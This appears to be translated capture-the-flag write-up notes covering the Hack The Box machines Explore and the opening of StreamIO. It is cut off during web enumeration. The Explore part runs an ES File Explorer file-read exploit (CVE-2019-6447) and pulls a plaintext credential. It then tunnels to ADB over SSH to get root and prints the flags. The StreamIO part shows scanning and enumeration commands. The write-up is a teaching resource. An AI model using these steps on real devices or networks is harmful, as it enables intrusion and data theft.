MetaProducts Offline Explorer 1.x - FileSystem Disclosure | windows/remote/20488.txt
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2) | windows/remote/3808.html
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1) | windows/remote/24495.rb
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2) | windows/remote/24538.rb
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit) | windows/remote/25999.rb
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC) | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027) | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection | php/webapps/35851.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The second entry clearly matches. We do not know the exact version, but it is worth trying; first copy the exploit locally:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit -m 50070
Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
URL: https://www.exploit-db.com/exploits/50070
Path: /usr/share/exploitdb/exploits/android/remote/50070.py
Codes: CVE-2019-6447
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/cvestone/Desktop/htb/Explore/50070.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ls
10.129.178.12.gnmap 10.129.178.12.nmap 10.129.178.12.xml 50070.py Explore.pdf nmapscan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# head -n 20 50070.py
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
import requests
import json
import ast
import sys
if len(sys.argv) < 3:
print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
sys.exit(1)
url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
ES File Explorer arbitrary file read
This exploit abuses an arbitrary file read; the usage is clear from the source, so try it:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getDeviceInfo 10.129.178.12
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : VMware Virtual Platform
ftpRoot : /sdcard
ftpPort : 3721
# list the pictures first rather than every file, which would be too much to sift through
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py listPics 10.129.178.12
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
creds.jpg is the most interesting file here; the others turned out to have little value after reading them. Download it:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getFile 10.129.178.12 /storage/emulated/0/DCIM/creds.jpg
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
[+] Downloading file...
[+] Done. Saved as `out.dat`.
It looks like a credential; record it: kristi:Kr1sT!5h@Rp3xPl0r3!
The case of some characters may have been misread from the image, so try variations if it is rejected. The obvious next step is to try it over SSH.
Getting a foothold
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh kristi@10.129.178.12 -p 2222
Unable to negotiate with 10.129.178.12 port 2222: no matching host key type found. Their offer: ssh-rsa
This error means the client and server could not agree on a host key algorithm: the server only offers ssh-rsa (RSA with SHA-1 signatures), which recent OpenSSH clients disable by default. Re-enable it for this host with the -o HostKeyAlgorithms option:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -oHostKeyAlgorithms=ssh-rsa kristi@10.129.178.12 -p 2222
The authenticity of host '[10.129.178.12]:2222 ([10.129.178.12]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.129.178.12]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@10.129.178.12) Password:
127|:/ $ whoami
u0_a76
:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
Clearly an unprivileged app user (uid 10076 in the untrusted_app SELinux context). See what files there are:
:/ $ ls -liah
total 1.4M
5231 drwxrwxrwt 15 root root 980 2024-02-19 22:42 .
5231 drwxrwxrwt 15 root root 980 2024-02-19 22:42 ..
1 dr-xr-xr-x 52 root root 0 2024-02-19 22:42 acct
5240 lrwxrwxrwx 1 root root 11 2024-02-19 22:42 bin -> /system/bin
5241 lrwxrwxrwx 1 root root 50 2024-02-19 22:42 bugreports -> /data/user_de/0/com.android.shell/files/bugreports
5575 drwxrwx--- 6 system cache 120 2024-02-19 22:42 cache
5243 lrwxrwxrwx 1 root root 13 2024-02-19 22:42 charger -> /sbin/charger
5519 drwxr-xr-x 3 root root 0 2024-02-19 22:42 config
5245 lrwxrwxrwx 1 root root 17 2024-02-19 22:42 d -> /sys/kernel/debug
163842 drwxrwx--x 37 system system 4.0K 2021-03-15 16:49 data
5247 -rw------- 1 root root 1.0K 2024-02-19 22:42 default.prop
5304 drwxr-xr-x 16 root root 2.6K 2024-02-19 22:42 dev
5249 lrwxrwxrwx 1 root root 11 2024-02-19 22:42 etc -> /system/etc
5250 -rw-r----- 1 root root 753 2024-02-19 22:42 fstab.android_x86_64
5251 -rwxr-x--- 1 root root 2.2M 2024-02-19 22:42 init
5252 -rwxr-x--- 1 root root 3.3K 2024-02-19 22:42 init.android_x86_64.rc
5253 -rwxr-x--- 1 root root 1.0K 2024-02-19 22:42 init.environ.rc
5254 -rwxr-x--- 1 root root 29K 2024-02-19 22:42 init.rc
5255 -rwxr-x--- 1 root root 582 2024-02-19 22:42 init.superuser.rc
5256 -rwxr-x--- 1 root root 7.5K 2024-02-19 22:42 init.usb.configfs.rc
5257 -rwxr-x--- 1 root root 5.5K 2024-02-19 22:42 init.usb.rc
5258 -rwxr-x--- 1 root root 511 2024-02-19 22:42 init.zygote32.rc
5259 -rwxr-x--- 1 root root 875 2024-02-19 22:42 init.zygote64_32.rc
5404 lrwxrwxrwx 1 root root 10 2024-02-19 22:42 lib -> system/lib
5311 drwxr-xr-x 11 root system 240 2024-02-19 22:42 mnt
5261 drwxr-xr-x 2 root root 220 2024-02-19 22:42 odm
5271 drwxr-xr-x 2 root root 40 2024-02-19 22:42 oem
5272 -rw-r--r-- 1 root root 23K 2024-02-19 22:42 plat_file_contexts
5273 -rw-r--r-- 1 root root 7.0K 2024-02-19 22:42 plat_hwservice_contexts
5274 -rw-r--r-- 1 root root 6.5K 2024-02-19 22:42 plat_property_contexts
5275 -rw-r--r-- 1 root root 1.2K 2024-02-19 22:42 plat_seapp_contexts
5276 -rw-r--r-- 1 root root 14K 2024-02-19 22:42 plat_service_contexts
1 dr-xr-xr-x 184 root root 0 2024-02-19 22:42 proc
5278 lrwxrwxrwx 1 root root 15 2024-02-19 22:42 product -> /system/product
5279 drwxr-x--- 2 root root 140 2024-02-19 22:42 sbin
5285 lrwxrwxrwx 1 root root 21 2024-02-19 22:42 sdcard -> /storage/self/primary
5286 -rw-r--r-- 1 root root 357K 2024-02-19 22:42 sepolicy
5534 drwxr-xr-x 4 root root 80 2024-02-19 22:42 storage
1 dr-xr-xr-x 12 root root 0 2024-02-19 22:42 sys
2 drwxr-xr-x 18 root root 4.0K 2020-03-25 00:12 system
5290 -rw-r--r-- 1 root root 464 2024-02-19 22:42 ueventd.android_x86_64.rc
5291 -rw-r--r-- 1 root root 5.0K 2024-02-19 22:42 ueventd.rc
5292 lrwxrwxrwx 1 root root 14 2024-02-19 22:42 vendor -> /system/vendor
5293 -rw-r--r-- 1 root root 6.9K 2024-02-19 22:42 vendor_file_contexts
5294 -rw-r--r-- 1 root root 0 2024-02-19 22:42 vendor_hwservice_contexts
5295 -rw-r--r-- 1 root root 392 2024-02-19 22:42 vendor_property_contexts
5296 -rw-r--r-- 1 root root 0 2024-02-19 22:42 vendor_seapp_contexts
5297 -rw-r--r-- 1 root root 0 2024-02-19 22:42 vendor_service_contexts
5298 -rw-r--r-- 1 root root 65 2024-02-19 22:42 vndservice_contexts
It looks like a Linux root directory layout, but with some differences, and there is no home directory. Let's check a few directories of interest:
:/ $ ls -liah data
ls: data: Permission denied
1|:/ $ ls -liah sdcard
5285 lrwxrwxrwx 1 root root 21 2024-02-19 22:42 sdcard -> /storage/self/primary
:/ $ cd /storage/self/primary
:/storage/self/primary $ ls -liah
total 34K
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 .
172116 drwx--x--x 4 root everybody 4.0K 2021-03-13 17:16 ..
181241 drwxrwx--- 5 root everybody 4.0K 2021-03-13 17:30 .estrongs
180902 -rw-rw---- 1 root everybody 72 2024-02-19 22:43 .userReturn
180804 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Alarms
180773 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:16 Android
180809 drwxrwx--- 2 root everybody 4.0K 2021-04-21 02:38 DCIM
180808 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:37 Download
180807 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Movies
180801 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Music
180805 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Notifications
180806 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Pictures
180802 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Podcasts
180803 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Ringtones
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 backups
188491 drwxrwx--- 2 root everybody 4.0K 2021-04-21 02:12 dianxinos
180731 -rw-rw---- 1 root everybody 33 2021-03-13 18:28 user.txt
In the path that the mounted sdcard points to, we found user.txt:
:/storage/self/primary $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
We also found an interesting backups directory:
:/storage/self/primary $ cd backups
:/storage/self/primary/backups $ ls -liah
total 6.0K
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 .
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 ..
188898 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:30 apps
:/storage/self/primary/backups $ cd apps
:/storage/self/primary/backups/apps $ ls -liah
total 4.0K
188898 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:30 .
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 ..
However, it contains nothing. We keep looking for other potentially interesting paths; although this is Android, we can still try the paths we would check for Linux privilege escalation. After many attempts nothing of much interest turned up, or more precisely, I lacked the experience to find it.
First look at ADB
From the earlier port scan, although nmap reported the service on port 5555 as possibly freeciv, it is very likely ADB. Since our goal is privilege escalation, and ADB in turn needs the highest privileges to function normally, we prioritise trying ADB. First, check the state of port 5555:
:/ $ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 *:2222 *:*
LISTEN 0 8 [::ffff:127.0.0.1]:35955 *:*
LISTEN 0 4 *:5555 *:*
LISTEN 0 10 *:42135 *:*
LISTEN 0 50 [::ffff:10.129.178.12]:40471 *:*
LISTEN 0 50 *:59777 *:*
Port 5555 is indeed listening inside the target, whereas the external nmap scan showed it as filtered. This indirectly shows the high value of this port and of ADB, otherwise there would be no need to filter and hide it. As verification, we can also try connecting with a local adb client or nc:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 10.129.178.12
failed to connect to '10.129.178.12:5555': Connection timed out
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nc 10.129.178.12 5555
Ncat: TIMEOUT.
Both methods time out.
SSH port forwarding
But since we already have an ordinary-user shell on the target, we can bypass the filter with SSH tunnel port forwarding:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -L 5555:localhost:5555 kristi@10.129.178.12 -p 2222 -oHostKeyAlgorithms=ssh-rsa
Password authentication
(kristi@10.129.178.12) Password:
:/ $
This forwards the target's local port 5555 to port 5555 on our Kali box.
Connecting to ADB remotely
Trying to connect to ADB again, this time it connects:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 127.0.0.1
connected to 127.0.0.1:5555
Privilege escalation
Now that ADB is connected, we can get a shell and escalate directly:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb shell
x86_64:/ $ whoami
shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # whoami
root
:/ # cd data
:/data # ls
adb bootchart media property tombstones
anr cache mediadrm resource-cache user
app dalvik-cache misc root.txt user_de
app-asec data misc_ce ss vendor
app-ephemeral drm misc_de ssh_starter.sh vendor_ce
app-lib es_starter.sh nfc system vendor_de
app-private local ota system_ce
backup lost+found ota_package system_de
:/data # cat root.txt
f04fc82b6d49b41c9b08982be59338c5
The data directory was inaccessible earlier; re-visiting it as root, we finally see the final flag.
Summary
The nmap results show only unfamiliar, non-standard ports, because the target is an unfamiliar device; so this machine mainly trains the mindset of information gathering. It is a suitable entry-level machine for a first encounter with Android device penetration testing: one gets to know Android's basic directory structure, collects some potentially valuable attack paths, gains a basic understanding of ADB, the most commonly used tool for debugging Android devices, and accumulates experience with Android privilege escalation. Relatively speaking, the hard part is the SSH port forwarding.
StreamIO
Study notes from "Red Team Notes"
Machine introduction
StreamIO is a medium machine that covers subdomain enumeration leading to an SQL injection in order to retrieve stored user credentials, which are cracked to gain access to an administration panel. The administration panel is vulnerable to LFI, which allows us to retrieve the source code for the administration pages and leads to identifying a remote file inclusion vulnerability, the abuse of which gains us access to the system. After the initial shell we leverage the SQLCMD command line utility to enumerate databases and obtain further credentials used in lateral movement. As the secondary user we use `WinPEAS` to enumerate the system and find saved browser databases, which are decoded to expose new credentials. Using the new credentials within BloodHound we discover that the user has the ability to add themselves to a specific group in which they can read LDAP secrets. Without direct access to the account we use PowerShell to abuse this feature and add ourselves to the `Core Staff` group, then access LDAP to disclose the administrator LAPS password.
Difficulty
Medium
Information gathering
Full TCP port scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap --min-rate 10000 -sT -p- 10.129.226.249 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.82% done; ETC: 17:25 (0:00:11 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49744/tcp open unknown
52734/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 93.82 seconds
Processing the port list:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# export $ports
export: not an identifier: 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734
Detailed TCP scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nmap -sT -sC -sV -T4 -O -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:34 CST
NSOCK ERROR [202.3680s] mksock_bind_addr(): Bind to 0.0.0.0:902 failed (IOD #153): Address already in use (98)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-20 16:34:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2024-02-20T16:37:42+00:00; +6h59m35s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=streamIO/countryName=EU
| Subject Alternative Name: DNS:streamIO.htb, DNS:watch.streamIO.htb
| Not valid before: 2022-02-22T07:03:28
|_Not valid after: 2022-03-24T07:03:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: streamIO.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49744/tcp open msrpc Microsoft Windows RPC
52734/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (87%)
Aggressive OS guesses: Microsoft Windows Server 2019 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-02-20T16:37:05
|_ start_date: N/A
|_clock-skew: mean: 6h59m34s, deviation: 0s, median: 6h59m34s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.77 seconds
UDP port scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.226.249 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:24 CST
Stats: 0:01:14 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 29.75% done; ETC: 17:28 (0:02:57 remaining)
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.27s latency).
Not shown: 997 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 1371.18 seconds
Vulnerability script scan:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 53,80,88,135,139,389,443,445,464,593,636,3268,3269,5985,9389,49667,49677,49678,49744,52734 10.129.226.249 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 17:36 CST
Nmap scan report for 10.129.226.249 (10.129.226.249)
Host is up (0.30s latency).
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49744/tcp open unknown
52734/tcp open unknown
Host script results:
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-054: false
Nmap done: 1 IP address (1 host up) scanned in 3048.36 seconds
Scan result analysis
From the port scan results, this is very likely a domain controller: many of the open ports and services match a DC's profile, the domain name is exposed, and the most probable OS is Windows Server 2019. In terms of attack surface priority, SMB (445), LDAP and the web come first. Also, remember that whenever a domain name is encountered, first write it into the local hosts file.
Subdomain brute-forcing with wfuzz
To make information gathering complete, we can brute-force subdomains, because besides watch there may be other valuable subdomains that the nmap scan did not reveal. wfuzz can be used:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# wfuzz -u https://streamio.htb -H "HOST: FUZZ.streamio.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: https://streamio.htb/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
...
000004427: 404 6 L 24 W 315 Ch "www.biz - www.biz"
000004409: 404 6 L 24 W 315 Ch "mail07 - mail07"
000004423: 404 6 L 24 W 315 Ch "samp - samp"
000004413: 404 6 L 24 W 315 Ch "www.money - www.money"
000004417: 404 6 L 24 W 315 Ch "author - author"
000004418: 404 6 L 24 W 315 Ch "diablo - diablo"
000004415: 404 6 L 24 W 315 Ch "sydney - sydney"
000004420: 404 6 L 24 W 315 Ch "word - word"
000004416: 404 6 L 24 W 315 Ch "kraken - kraken"
000004419: 404 6 L 24 W 315 Ch "wwwww - wwwww"
000004412: 404 6 L 24 W 315 Ch "jg - jg"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 283.9004
Processed Requests: 4456
Filtered Requests: 0
Requests/sec.: 15.69564
No other subdomains were found.
Exploitation
Attempting to enumerate SMB shares
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H 10.129.226.204
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbclient -L //10.129.226.204 -N
session setup failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb 10.129.226.204
SMB 10.129.226.204 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
Although we could not list any accessible SMB shares, crackmapexec revealed a new subdomain, dc.streamio.htb, which we also add to the hosts file.
smbmap is mostly used for probing and scanning to obtain structural information, and is very powerful for enumerating SMB shares; smbclient is mostly used to interact with the SMB service to access and fetch resources; crackmapexec is a comprehensive, very powerful tool that is indispensable in Active Directory assessments. Because it works through built-in, standard Active Directory functions and protocols, it evades endpoint protection, intrusion detection and prevention products to some extent. It also depends on the impacket library and has its own database, which can be accessed with the cmedb command, for example:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cmedb
cmedb (default)(smb) > help
Documented commands (type help <topic>):
========================================
help
Undocumented commands:
======================
back creds exit export groups hosts import shares
cmedb (default)(smb) > hosts
+Hosts---+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| HostID | Admins | IP | Hostname | Domain | OS | SMBv1 | Signing |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+
| 1 | 0 Cred(s) | 10.129.228.115 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 2 | 0 Cred(s) | 10.129.207.210 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 3 | 0 Cred(s) | 10.129.229.178 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 4 | 1 Cred(s) | 10.129.229.198 | PIVOTAPI | LICORDEBELLOTA | Windows 10.0 Build 17763 | 0 | 1 |
| 5 | 0 Cred(s) | 10.129.226.204 | DC | STREAMIO | Windows 10.0 Build 17763 | 0 | 1 |
+--------+-----------+----------------+----------+----------------+--------------------------+-------+---------+
In addition, enum4linux is often used in domain enumeration:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# enum4linux 10.129.226.204
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Feb 21 14:17:48 2024
=========================================( Target Information )=========================================
Target ........... 10.129.226.204
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.129.226.204 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 10.129.226.204 )===============================
Looking up status of 10.129.226.204
No reply from 10.129.226.204
==================================( Session Check on 10.129.226.204 )==================================
[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.
In summary, attacks against the SMB service did not yield much of value.
Attempting to access the web service
Whether we visit the IP, the main domain or the subdomain, the page always shows the same IIS default page:
Viewing the source reveals nothing either, so by experience we can run a directory brute-force to see whether there is any hidden directory to use:
Directory brute-forcing
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# gobuster dir -u http://streamio.htb --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://streamio.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
At the same time, we can also brute-force the subdomain's directories in the same way.
First look at the site's functionality
Note: since we accessed http above, we should also visit https to see whether the same page is shown. It is not:
